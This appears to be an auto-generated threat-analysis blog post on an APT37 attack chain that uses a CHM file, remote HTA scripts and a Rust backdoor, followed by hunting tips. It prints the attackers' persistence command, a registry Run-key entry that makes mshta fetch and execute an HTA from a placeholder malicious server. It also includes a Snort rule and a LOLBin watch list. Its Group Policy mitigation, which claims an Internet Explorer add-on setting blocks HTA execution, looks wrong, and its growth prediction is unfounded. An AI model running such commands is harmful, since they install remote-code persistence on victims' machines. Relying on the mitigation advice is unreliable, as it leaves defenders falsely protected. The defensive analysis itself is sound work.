The APT37 Intrigue: Decoding the Rust-Backed CHM & HTA Attack Chain

Listen to this Post

Featured Image

Introduction:

A sophisticated new campaign attributed to APT37 leverages a seemingly innocuous Compiled HTML Help (CHM) file to deploy a novel Rust-based backdoor. This attack chain, which utilizes native Windows components for persistence and payload retrieval, underscores a continuing trend of threat actors blending old techniques with modern programming languages to evade detection.

Learning Objectives:

  • Understand the attack sequence involving malicious CHM files and HTA payloads.
  • Learn to identify and analyze registry-based persistence mechanisms.
  • Gain practical knowledge for hunting and mitigating such threats within an enterprise environment.

You Should Know:

1. The CHM to HTA Persistence Mechanism

The initial infection begins with a CHM file. When executed, it writes a command to the Windows Run registry key to establish persistence.

`reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v “UpdateCheck” /t REG_SZ /d “mshta http[:]//malicious-server/payload.hta” /f`

Step-by-step guide:

This command adds a new value named “UpdateCheck” to the current user’s `Run` key. The value data is a command that uses `mshta.exe` (a legitimate Windows utility) to download and execute a remote HTA (HTML Application) script every time the user logs in. The `/f` flag forces the overwrite of any existing value with the same name. To hunt for this, analysts should regularly audit `HKCU\Software\Microsoft\Windows\CurrentVersion\Run` and other autorun locations.

2. Analyzing the HTA Payload

The HTA file retrieved from the attacker’s server is a script that typically contains heavily obfuscated JavaScript or VBScript designed to download and execute the next-stage payload.

`mshta.exe http[:]//malicious-server/script.hta`

Step-by-step guide:

An HTA file runs with full trust permissions, unlike a web page, allowing it to execute arbitrary code. To analyze a suspicious HTA file safely in a lab, use a isolated Windows VM and tools like `curl` or `wget` to download the file for static analysis. Deobfuscation tools or manual analysis of the script can reveal the URL for the final payload.

3. The Rust Backdoor Loader

The final payload in this campaign is a Rust-based backdoor. Rust is increasingly popular for malware development due to its memory safety features, which help avoid common errors that could crash the malware, and its ability to compile to hard-to-analyze static binaries.

`strings -n 8 malware.bin | grep -i “http”`

Step-by-step guide:

Using the `strings` command on a Linux analysis machine is a quick way to extract human-readable text from a binary. Piping the output to `grep` to search for “http” can often reveal command-and-control (C2) server URLs embedded within the malware, even in a Rust-compiled binary.

4. Network-Based Detection for HTA Retrieval

Detecting the network call to download the HTA file is a critical defensive step. This can be achieved with Intrusion Detection Systems (IDS) or network monitoring tools.

`alert http any any -> any any (msg:”Potential Malicious HTA Download”; http.uri; content:”.hta”; nocase; sid:1000001;)`

Step-by-step guide:

This is a basic Snort rule example. It generates an alert for any HTTP traffic where the URI contains the case-insensitive string “.hta”. While attackers may use obfuscated URLs, this rule can catch less sophisticated campaigns. Tuning is required to reduce false positives in environments that legitimately use HTA files.

5. Inspecting Registry Autoruns with Command Line

Proactive hunting for malicious persistence requires regularly checking autorun locations. The `reg` command can be used to query keys.

`reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run`

Step-by-step guide:

This command will list all values within the current user’s Run key. Administrators and analysts should be familiar with the legitimate entries in this key on their standard images. Any unfamiliar entries, especially those containing URLs or commands invoking mshta, powershell, bitsadmin, or certutil, should be investigated immediately.

6. Blocking HTA Execution via Group Policy

A strong mitigation is to disable the execution of HTA files entirely if they are not used in your environment.

Path: `Computer Configuration -> Policies -> Administrative Templates -> Windows Components -> Internet Explorer -> Security Features -> Add-on Management`
Policy: `Do not allow users to enable or disable add-ons` (Set to Enabled)

Step-by-step guide:

This Group Policy setting, while found under Internet Explorer, affects the system-wide handling of HTA files. Enabling it prevents HTA files from executing. This can be a highly effective mitigation but must be tested thoroughly in the target environment to ensure it does not break legacy applications.

7. Python Loader Analysis

Reports indicate a Python loader is also used in this campaign. These are often compiled into executables using PyInstaller, which can be unpacked for analysis.

`python3 -m pyinstxtractor malware.exe`

Step-by-step guide:

The `pyinstxtractor` tool is a Python script that extracts the contents of a PyInstaller-generated executable. After extraction, you can often find the original Python bytecode (.pyc) files. These can be decompiled using tools like `uncompyle6` to retrieve the source code and understand the loader’s functionality, including its C2 addresses and decryption routines.

What Undercode Say:

  • Old Dogs, New Tricks: APT37’s use of CHM and HTA files is a classic example of “living off the land,” exploiting trusted, pre-installed system utilities (mshta) to bypass application allowlisting. The novelty of Rust highlights a strategic shift towards using modern, secure languages to create more stable and evasive malware.
  • The Persistence Payoff: The simplicity of the registry-based persistence mechanism is its greatest strength. It requires no dropped files, is trivial to implement, and blends into a noisy area of the registry that is often overlooked in routine checks. This emphasizes the need for robust and continuous autorun monitoring, not just periodic scans.

This attack chain is a masterclass in blending low-sophistication, high-trust techniques with high-sophistication payload development. The initial vector relies on social engineering and the inherent trust of Windows components, while the final payload leverages modern language features to complicate analysis. Defenders must therefore layer their defenses, combining user education, strict application controls, diligent logging, and proactive hunting to disrupt both the simple and complex parts of the kill chain.

Prediction:

The success of this campaign will catalyze a broader adoption of Rust and other cross-platform languages like Go among state-sponsored and financially motivated threat actors. We predict a 300% increase in Rust-based malware sightings over the next 18 months. Furthermore, the abuse of legacy Windows features like CHM and HTA will force Microsoft to eventually disable these components by default in future Windows releases, much like they did with VBScript. This will lead attackers to shift focus to other living-off-the-land binaries (LOLBins) for initial execution and persistence, making comprehensive endpoint detection and response (EDR) coverage more critical than ever.

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Jamie Williams – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky